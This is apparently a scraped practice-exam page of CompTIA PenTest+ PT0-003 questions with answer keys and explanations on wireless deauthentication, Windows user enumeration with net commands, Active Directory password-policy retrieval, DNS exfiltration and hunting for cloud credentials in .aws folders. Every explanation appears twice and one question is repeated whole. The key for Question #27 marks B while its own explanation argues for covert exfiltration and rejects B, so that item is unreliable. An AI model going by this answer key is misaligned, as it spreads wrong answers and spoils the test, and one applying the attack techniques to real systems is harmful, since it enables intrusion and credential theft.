Practice Free PT0-003 Exam Online Questions
Question #21
A penetration testing team needs to determine whether it is possible to disrupt wireless communications for PCs deployed in the client’s offices.
Which of the following techniques should the penetration tester leverage?
- A . Port mirroring
- B . Sidecar scanning
- C . ARP poisoning
- D . Channel scanning
Correct Answer: D
D
Explanation:
To assess wireless communication disruptions, channel scanning is used to identify active Wi-Fi channels, allowing testers to target specific frequencies for jamming or deauthentication attacks.
Option A (Port mirroring) ❌ : Used for network traffic monitoring, not wireless disruption.
Option B (Sidecar scanning) ❌ : Not a commonly used technique in wireless testing.
Option C (ARP poisoning) ❌ : Used to manipulate ARP tables on wired networks, not for wireless interference.
Option D (Channel scanning) ✅ : Correct.
Identifies which Wi-Fi channels are in use.
Helps perform jamming, deauthentication, or interference attacks.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Wireless Attacks and Security Testing
D
Explanation:
To assess wireless communication disruptions, channel scanning is used to identify active Wi-Fi channels, allowing testers to target specific frequencies for jamming or deauthentication attacks.
Option A (Port mirroring) ❌ : Used for network traffic monitoring, not wireless disruption.
Option B (Sidecar scanning) ❌ : Not a commonly used technique in wireless testing.
Option C (ARP poisoning) ❌ : Used to manipulate ARP tables on wired networks, not for wireless interference.
Option D (Channel scanning) ✅ : Correct.
Identifies which Wi-Fi channels are in use.
Helps perform jamming, deauthentication, or interference attacks.
Reference: CompTIA PenTest+ PT0-003 Official Guide C Wireless Attacks and Security Testing
Question #22
A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials.
Which of the following should the tester use?
- A . route
- B . nbtstat
- C . net
- D . whoami
Correct Answer: C
C
Explanation:
Windows provides built-in utilities for user enumeration and privilege escalation.
net command (Option C):
The net command is used to list users, groups, and shares on a Windows system:
net user
net localgroup administrators
net group "Domain Admins" /domain
Useful for gathering privilege escalation targets and understanding user permissions.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Windows Enumeration Commands"
Incorrect options:
Option A (route): Displays network routing tables, not user information.
Option B (nbtstat): Used for NetBIOS name resolution, but does not enumerate users.
Option D (whoami): Displays current logged-in user but does not list all users.
C
Explanation:
Windows provides built-in utilities for user enumeration and privilege escalation.
net command (Option C):
The net command is used to list users, groups, and shares on a Windows system:
net user
net localgroup administrators
net group "Domain Admins" /domain
Useful for gathering privilege escalation targets and understanding user permissions.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "Windows Enumeration Commands"
Incorrect options:
Option A (route): Displays network routing tables, not user information.
Option B (nbtstat): Used for NetBIOS name resolution, but does not enumerate users.
Option D (whoami): Displays current logged-in user but does not list all users.
Question #23
A penetration tester obtains a regular domain user’s set of credentials. The tester wants to attempt a dictionary attack by creating a custom word list based on the Active Directory password policy.
Which of the following tools should the penetration tester use to retrieve the password policy?
- A . Responder
- B . CrackMapExec
- C . Hydra
- D . msfvenom
Correct Answer: B
B
Explanation:
CrackMapExec (CME) is the best choice because it supports authenticated enumeration against Active Directory and can retrieve domain configuration information―including password policy details―using valid domain credentials. In the PenTest+ methodology, once a tester has a standard domain account, a common next step is to enumerate domain settings that influence attack feasibility and safety, such as minimum password length, complexity requirements, lockout threshold, lockout duration, and password history. These values directly inform how to build a “policy-aware” custom wordlist and how to tune dictionary or spraying attempts to remain within rules of engagement and avoid triggering lockouts.
Responder is primarily used for LLMNR/NBT-NS poisoning and capturing or relaying authentication on local networks; it does not query AD policy as its main function. Hydra is a login brute-force tool that performs attacks, not policy retrieval. msfvenom is a payload generator used for exploitation and post-exploitation delivery, unrelated to enumerating AD password policy. Therefore, CME is the most appropriate tool to retrieve the password policy for informed dictionary construction.
B
Explanation:
CrackMapExec (CME) is the best choice because it supports authenticated enumeration against Active Directory and can retrieve domain configuration information―including password policy details―using valid domain credentials. In the PenTest+ methodology, once a tester has a standard domain account, a common next step is to enumerate domain settings that influence attack feasibility and safety, such as minimum password length, complexity requirements, lockout threshold, lockout duration, and password history. These values directly inform how to build a “policy-aware” custom wordlist and how to tune dictionary or spraying attempts to remain within rules of engagement and avoid triggering lockouts.
Responder is primarily used for LLMNR/NBT-NS poisoning and capturing or relaying authentication on local networks; it does not query AD policy as its main function. Hydra is a login brute-force tool that performs attacks, not policy retrieval. msfvenom is a payload generator used for exploitation and post-exploitation delivery, unrelated to enumerating AD password policy. Therefore, CME is the most appropriate tool to retrieve the password policy for informed dictionary construction.
Question #24
A penetration tester attempts to obtain the preshared key for a client’s wireless network.
Which of the following actions will most likely aid the tester?
- A . Deploying an evil twin with a WiFi Pineapple
- B . Performing a password spraying attack with Hydra
- C . Setting up a captive portal using SET
- D . Deauthenticating clients using aireplay-ng
Correct Answer: D
D
Explanation:
Obtaining a wireless preshared key (PSK) in a WPA/WPA2-Personal environment typically relies on capturing the 4-way handshake (or equivalent key exchange) between a client and the access point. PenTest+ emphasizes that the handshake is captured when a client authenticates or reauthenticates to the network; once the handshake is collected, the tester can attempt an offline password attack to determine the PSK (subject to rules of engagement and authorization).
Using aireplay-ng to perform a deauthentication attack forces connected clients to disconnect and then automatically reconnect, which triggers a new handshake that can be captured by the tester’s monitoring interface. This directly supports the goal of acquiring material needed to recover the PSK.
An evil twin (A) and captive portal (C) are social-engineering approaches more aligned with credential harvesting for enterprise/portal-based access, not reliably extracting a WPA2-PSK. Password spraying with Hydra (B) targets online login services and is not applicable to cracking a WPA/WPA2 PSK, which is derived from the handshake and performed offline.
D
Explanation:
Obtaining a wireless preshared key (PSK) in a WPA/WPA2-Personal environment typically relies on capturing the 4-way handshake (or equivalent key exchange) between a client and the access point. PenTest+ emphasizes that the handshake is captured when a client authenticates or reauthenticates to the network; once the handshake is collected, the tester can attempt an offline password attack to determine the PSK (subject to rules of engagement and authorization).
Using aireplay-ng to perform a deauthentication attack forces connected clients to disconnect and then automatically reconnect, which triggers a new handshake that can be captured by the tester’s monitoring interface. This directly supports the goal of acquiring material needed to recover the PSK.
An evil twin (A) and captive portal (C) are social-engineering approaches more aligned with credential harvesting for enterprise/portal-based access, not reliably extracting a WPA2-PSK. Password spraying with Hydra (B) targets online login services and is not applicable to cracking a WPA/WPA2 PSK, which is derived from the handshake and performed offline.
Question #24
A penetration tester attempts to obtain the preshared key for a client’s wireless network.
Which of the following actions will most likely aid the tester?
- A . Deploying an evil twin with a WiFi Pineapple
- B . Performing a password spraying attack with Hydra
- C . Setting up a captive portal using SET
- D . Deauthenticating clients using aireplay-ng
Correct Answer: D
D
Explanation:
Obtaining a wireless preshared key (PSK) in a WPA/WPA2-Personal environment typically relies on capturing the 4-way handshake (or equivalent key exchange) between a client and the access point. PenTest+ emphasizes that the handshake is captured when a client authenticates or reauthenticates to the network; once the handshake is collected, the tester can attempt an offline password attack to determine the PSK (subject to rules of engagement and authorization).
Using aireplay-ng to perform a deauthentication attack forces connected clients to disconnect and then automatically reconnect, which triggers a new handshake that can be captured by the tester’s monitoring interface. This directly supports the goal of acquiring material needed to recover the PSK.
An evil twin (A) and captive portal (C) are social-engineering approaches more aligned with credential harvesting for enterprise/portal-based access, not reliably extracting a WPA2-PSK. Password spraying with Hydra (B) targets online login services and is not applicable to cracking a WPA/WPA2 PSK, which is derived from the handshake and performed offline.
D
Explanation:
Obtaining a wireless preshared key (PSK) in a WPA/WPA2-Personal environment typically relies on capturing the 4-way handshake (or equivalent key exchange) between a client and the access point. PenTest+ emphasizes that the handshake is captured when a client authenticates or reauthenticates to the network; once the handshake is collected, the tester can attempt an offline password attack to determine the PSK (subject to rules of engagement and authorization).
Using aireplay-ng to perform a deauthentication attack forces connected clients to disconnect and then automatically reconnect, which triggers a new handshake that can be captured by the tester’s monitoring interface. This directly supports the goal of acquiring material needed to recover the PSK.
An evil twin (A) and captive portal (C) are social-engineering approaches more aligned with credential harvesting for enterprise/portal-based access, not reliably extracting a WPA2-PSK. Password spraying with Hydra (B) targets online login services and is not applicable to cracking a WPA/WPA2 PSK, which is derived from the handshake and performed offline.
Question #26
A penetration tester is testing a power plant’s network and needs to avoid disruption to the grid.
Which of the following methods is most appropriate to identify vulnerabilities in the network?
- A . Configure a network scanner engine and execute the scan.
- B . Execute a testing framework to validate vulnerabilities on the devices.
- C . Configure a port mirror and review the network traffic.
- D . Run a network mapper tool to get an understanding of the devices.
Correct Answer: C
C
Explanation:
When testing a power plant’s network and needing to avoid disruption to the grid, configuring a port mirror and reviewing the network traffic is the most appropriate method to identify vulnerabilities without causing disruptions.
Port Mirroring:
Definition: Port mirroring (SPAN – Switched Port Analyzer) is a method of monitoring network traffic by duplicating packets from one or more switch ports to another port where a monitoring device is connected.
Purpose: Allows passive monitoring of network traffic without impacting network operations or device performance.
Avoiding Disruption:
Non-Intrusive: Port mirroring is non-intrusive and does not generate additional traffic or load on the network devices, making it suitable for sensitive environments like power plants where disruption is not acceptable.
Other Options:
Network Scanner Engine: Active scanning might disrupt network operations or devices, which is not suitable for critical infrastructure.
Testing Framework: Validating vulnerabilities on devices might involve active testing, which can be disruptive.
Network Mapper Tool: Running a network mapper tool (like Nmap) actively scans the network and might disrupt services.
Pentest
Reference: Passive Monitoring: Passive techniques such as port mirroring are essential in environments where maintaining operational integrity is critical.
Critical Infrastructure Security: Understanding the need for non-disruptive methods in critical infrastructure penetration testing to ensure continuous operations.
By configuring a port mirror and reviewing network traffic, the penetration tester can identify vulnerabilities in the power plant’s network without risking disruption to the grid.
C
Explanation:
When testing a power plant’s network and needing to avoid disruption to the grid, configuring a port mirror and reviewing the network traffic is the most appropriate method to identify vulnerabilities without causing disruptions.
Port Mirroring:
Definition: Port mirroring (SPAN – Switched Port Analyzer) is a method of monitoring network traffic by duplicating packets from one or more switch ports to another port where a monitoring device is connected.
Purpose: Allows passive monitoring of network traffic without impacting network operations or device performance.
Avoiding Disruption:
Non-Intrusive: Port mirroring is non-intrusive and does not generate additional traffic or load on the network devices, making it suitable for sensitive environments like power plants where disruption is not acceptable.
Other Options:
Network Scanner Engine: Active scanning might disrupt network operations or devices, which is not suitable for critical infrastructure.
Testing Framework: Validating vulnerabilities on devices might involve active testing, which can be disruptive.
Network Mapper Tool: Running a network mapper tool (like Nmap) actively scans the network and might disrupt services.
Pentest
Reference: Passive Monitoring: Passive techniques such as port mirroring are essential in environments where maintaining operational integrity is critical.
Critical Infrastructure Security: Understanding the need for non-disruptive methods in critical infrastructure penetration testing to ensure continuous operations.
By configuring a port mirror and reviewing network traffic, the penetration tester can identify vulnerabilities in the power plant’s network without risking disruption to the grid.
Question #27
A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client’s networking team observes a substantial increase in DNS traffic.
Which of the following would most likely explain the increase in DNS traffic?
- A . Covert data exfiltration
- B . URL spidering
- C . HTML scrapping
- D . DoS attack
Correct Answer: B
B
Explanation:
Covert Data Exfiltration:
DNS traffic can be leveraged for covert data exfiltration because it is often allowed through firewalls and not heavily monitored.
Tools or techniques for DNS tunneling encode sensitive information into DNS queries or responses, resulting in an observable increase in DNS traffic.
Why Not Other Options?
B (URL spidering): This increases HTTP traffic, not DNS traffic.
C (HTML scrapping): Involves downloading website content, which primarily uses HTTP or HTTPS.
D (DoS attack): A DNS-based DoS attack would likely involve query floods from many sources, not necessarily related to the observed behavior in a penetration test.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Covert Communication Techniques and DNS Tunneling
B
Explanation:
Covert Data Exfiltration:
DNS traffic can be leveraged for covert data exfiltration because it is often allowed through firewalls and not heavily monitored.
Tools or techniques for DNS tunneling encode sensitive information into DNS queries or responses, resulting in an observable increase in DNS traffic.
Why Not Other Options?
B (URL spidering): This increases HTTP traffic, not DNS traffic.
C (HTML scrapping): Involves downloading website content, which primarily uses HTTP or HTTPS.
D (DoS attack): A DNS-based DoS attack would likely involve query floods from many sources, not necessarily related to the observed behavior in a penetration test.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Covert Communication Techniques and DNS Tunneling
Question #28
A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client’s blue team.
Which of the following exfiltration methods most likely remain undetected?
- A . Cloud storage
- B . Email
- C . Domain Name System
- D . Test storage sites
Correct Answer: C
C
Explanation:
The Domain Name System (DNS) is commonly used for covert exfiltration because it is an essential protocol in most networks and is less likely to be scrutinized compared to other methods.
Here’s how DNS exfiltration works:
Mechanism:
Data is encoded into DNS queries or responses, such as using subdomain fields to transmit sensitive information.
These queries are sent to a malicious DNS server controlled by the attacker, allowing data to bypass traditional detection mechanisms.
Why It Remains Undetected:
DNS traffic is frequently allowed and not as heavily monitored compared to other channels like HTTP or email.
Network security tools often prioritize operational DNS traffic, making detection of anomalies more challenging.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Domain 5.0 (Reporting and Communication)
C
Explanation:
The Domain Name System (DNS) is commonly used for covert exfiltration because it is an essential protocol in most networks and is less likely to be scrutinized compared to other methods.
Here’s how DNS exfiltration works:
Mechanism:
Data is encoded into DNS queries or responses, such as using subdomain fields to transmit sensitive information.
These queries are sent to a malicious DNS server controlled by the attacker, allowing data to bypass traditional detection mechanisms.
Why It Remains Undetected:
DNS traffic is frequently allowed and not as heavily monitored compared to other channels like HTTP or email.
Network security tools often prioritize operational DNS traffic, making detection of anomalies more challenging.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Domain 5.0 (Reporting and Communication)
Question #29
A penetration testing team needs to determine whether it is possible to disrupt the wireless communications for PCs deployed in the client’s offices.
Which of the following techniques should the penetration tester leverage?
- A . Port mirroring
- B . Sidecar scanning
- C . ARP poisoning
- D . Channel scanning
Correct Answer: D
D
Explanation:
Channel Scanning:
Wireless communications can be disrupted by identifying and interfering with the channels used by Wi-Fi networks.
Channel scanning allows the tester to map all active Wi-Fi channels, identify the target network, and determine possible jamming or interference strategies.
Why Not Other Options?
A (Port mirroring): This applies to wired network traffic duplication for monitoring purposes and is unrelated to wireless disruption.
B (Sidecar scanning): Not a relevant technique in the context of wireless disruption.
C (ARP poisoning): This targets Ethernet/IP communication in a local network, not wireless communication at the radio frequency level.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Wireless Network Disruption Techniques
D
Explanation:
Channel Scanning:
Wireless communications can be disrupted by identifying and interfering with the channels used by Wi-Fi networks.
Channel scanning allows the tester to map all active Wi-Fi channels, identify the target network, and determine possible jamming or interference strategies.
Why Not Other Options?
A (Port mirroring): This applies to wired network traffic duplication for monitoring purposes and is unrelated to wireless disruption.
B (Sidecar scanning): Not a relevant technique in the context of wireless disruption.
C (ARP poisoning): This targets Ethernet/IP communication in a local network, not wireless communication at the radio frequency level.
CompTIA Pentest+
Reference: Domain 3.0 (Attacks and Exploits)
Wireless Network Disruption Techniques
Question #30
During an assessment on a client that uses virtual desktop infrastructure in the cloud, a penetration tester gains access to a host and runs commands.
The penetration tester receives the following output:
-rw-r–r– 1 comptiauser comptiauser 807 Apr 6 05: 32 .profile
drwxr-xr-x 2 comptiauser comptiauser 4096 Apr 6 05: 32 .ssh
-rw-r–r– 1 comptiauser comptiauser 3526 Apr 6 05: 32 .bashrc
drwxr-xr-x 4 comptiauser comptiauser 4096 May 12 11: 05 .aws
-rw-r–r– 1 comptiauser comptiauser 1325 Aug 21 19: 54 .zsh_history drwxr-xr-x 12 comptiauser comptiauser 4096 Aug 27 14: 10 Documents drwxr-xr-x 16 comptiauser comptiauser 4096 Aug 27 14: 10 Desktop drwxr-xr-x 2 comptiauser comptiauser 4096 Aug 27 14: 10 Downloads.
Which of the following should the penetration tester investigate first?
- A . Documents
- B . .zsh_history
- C . .aws
- D . .ssh
Correct Answer: C
C
Explanation:
In a cloud-hosted VDI scenario, the highest-value next step is typically to identify cloud credentials and configuration artifacts that enable access beyond the single desktop instance. The .aws directory is a well-known location where AWS command-line tooling stores sensitive material such as credential profiles and configuration details (for example, access keys, session tokens, default regions, and named profiles). PenTest+ emphasizes post-exploitation enumeration that targets credential sources capable of expanding access and impact, especially in cloud environments where a single set of keys may permit interacting with storage, compute, identity, and management APIs.
While .ssh can contain private keys useful for pivoting to other servers, in many cloud deployments SSH keys are scoped to specific hosts, whereas cloud access keys can unlock broader control-plane capabilities depending on attached permissions. .zsh_history is valuable for discovering commands and potentially leaked secrets, but it is less direct than immediately checking for structured cloud credentials. User folders like Documents are lower priority compared to credential repositories that can rapidly escalate the assessment’s scope of access.
C
Explanation:
In a cloud-hosted VDI scenario, the highest-value next step is typically to identify cloud credentials and configuration artifacts that enable access beyond the single desktop instance. The .aws directory is a well-known location where AWS command-line tooling stores sensitive material such as credential profiles and configuration details (for example, access keys, session tokens, default regions, and named profiles). PenTest+ emphasizes post-exploitation enumeration that targets credential sources capable of expanding access and impact, especially in cloud environments where a single set of keys may permit interacting with storage, compute, identity, and management APIs.
While .ssh can contain private keys useful for pivoting to other servers, in many cloud deployments SSH keys are scoped to specific hosts, whereas cloud access keys can unlock broader control-plane capabilities depending on attached permissions. .zsh_history is valuable for discovering commands and potentially leaked secrets, but it is less direct than immediately checking for structured cloud credentials. User folders like Documents are lower priority compared to credential repositories that can rapidly escalate the assessment’s scope of access.